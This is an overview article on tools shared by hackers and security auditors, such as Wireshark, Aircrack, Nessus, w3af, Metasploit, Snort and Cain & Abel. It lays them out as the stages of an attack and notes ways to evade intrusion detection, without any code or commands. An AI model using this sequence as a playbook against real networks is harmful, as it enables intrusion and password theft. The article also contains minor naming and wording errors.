Hacker toolkits are very similar to security toolkits. Both hackers and security experts strive to find vulnerabilities in networks and systems. The only differences between the two parties are their goals and the color of their hats.
There are thousands of tools and scripts around that do so many similar tasks. This article has selected key areas such as network analyzers, vulnerability Scanners, password crackers, and then discusses the most popular or outstanding candidate in that field.
Possibly, the single most important tool when evaluating a target network for a security audit or an attack is a network analyzer. A good network analyzer allows an attacker to visualize and document the network, its segmentation, its address plan, the protocol layers and the encryption, if any. Sometimes, just a brief glance is enough to tell if a network administrator is diligent in his design and maintenance or if the network is insecure.
When it comes to network analyzers, Wireshark is ages ahead of the competition. Wireshark is a fully functional open-source multi protocol packet analyzer, which works on Windows. Wireshark does live captures from the wire using pcap, or it can capture offline and save to a file for later analysis.
Wireshark sniffs a network in promiscuous mode by connecting to a span port on a switch. There, it can sniff all traffic for the entire LAN or subnet and display data per stream, making it easy to follow a particular TCP conversation. It captures and displays in real-time and displays what it captures in a GUI. It is very helpful to see the network in action. By visualizing the live data streams on a LAN segment, Wireshark makes it easy to pick out virus and spyware that scan the address space or badly behaved infected machines trying to hijack the local DNS.
Sometimes though, gaining physical access to the network is not feasible. That’s when switching the attack to Wi-Fi is a better way to mitigate damages.
Aircrack is a suite of programs used in testing and cracking WEP and WPA 802.11 a/b/g/n Wi-Fi networks. It has the best cracking algorithm around when recovering wireless encryption keys once it has gathered enough encrypted data packets. It has other modules that cater for data capture, analysis and an airplay packet injection.
For an attacker, gaining access to the network is all very good but it’s the hosts, particularly servers, which are the targets. Once identified, the attacker needs to evaluate his defenses, and this is where a good up-to-date vulnerability scanner comes into play.
When it comes to vulnerability scanners, Nessus is the most popular and flexible tool around. Nessus isn’t free. It’s about $1.2k a year, but that is still cheaper than a lot of its competitors. Nessus has a huge variety of vulnerability plug-ins (60k) as standard, and on the premium edition Nessus runs real-time vulnerability updates, unlimited number of scans and IPs per scan. Nessus will scan for missing or out of date security patches that will leave a system vulnerable to known attacks. It tests for open ports and protocol revisions searching for weakness against a huge database of known issues and vendor security releases.
W3af is a very popular program for finding and exploiting weaknesses within web applications. The project’s goal is to help secure the web by finding and exploiting all web application vulnerabilities. Described as a web application attack and audit tool, it has many additional web application exploitation plug-ins making it the most effective and flexible tool for attacking vulnerabilities and penetration testing websites.
Once the attacker identifies a potential vulnerability, another essential item in the attacker’s toolkit is a high quality penetration tester. The attacker will use this to launch pre-configured tried and tested targeted attacks.
The Metasploit community is an open-source penetration tester, but it has only basic exploitation features such as network discovery and limited ability to import scan data. The Pro edition is where it’s a great tool for penetration testing on all network sizes. Additional features include vulnerability testing with dynamic payloads, which are necessary to avoid intrusion prevention systems. It ships with hundreds of prepared exploits, and there are hundreds more in modules that can plug in to the extensible framework.
The problem for the attacker is intrusion detection systems will be monitoring the wire for suspicious behavior. If the attacker runs his own intrusion detector, he will be able to see what is going undetected and operate under the radar.
For IP wired networks, the Snort intrusion detection and prevention system can detect thousands of worms, viruses and vulnerability scans. It can detect most suspicious behavior and has thousands of configurable attack signatures available.
Once the attacker has focused on a potential victim and gained entry, it is time to try to gain administrative privileges. This is where a good password cracker comes in handy, and even though in this day and age it shouldn’t, it still does the trick.
Cain & Able
Cain & Able is a password recovery tool for Windows. Cain & Able can sniff weak passwords on the network, crack encrypted password through dictionary, brute force and cryptanalysis attacks. It can also record VoIP calls and decode scrambled passwords.
Like security experts, hackers are focused on system vulnerability. Whether you’re a security expert or a hacker, having a toolkit prepares you for electronic warfare.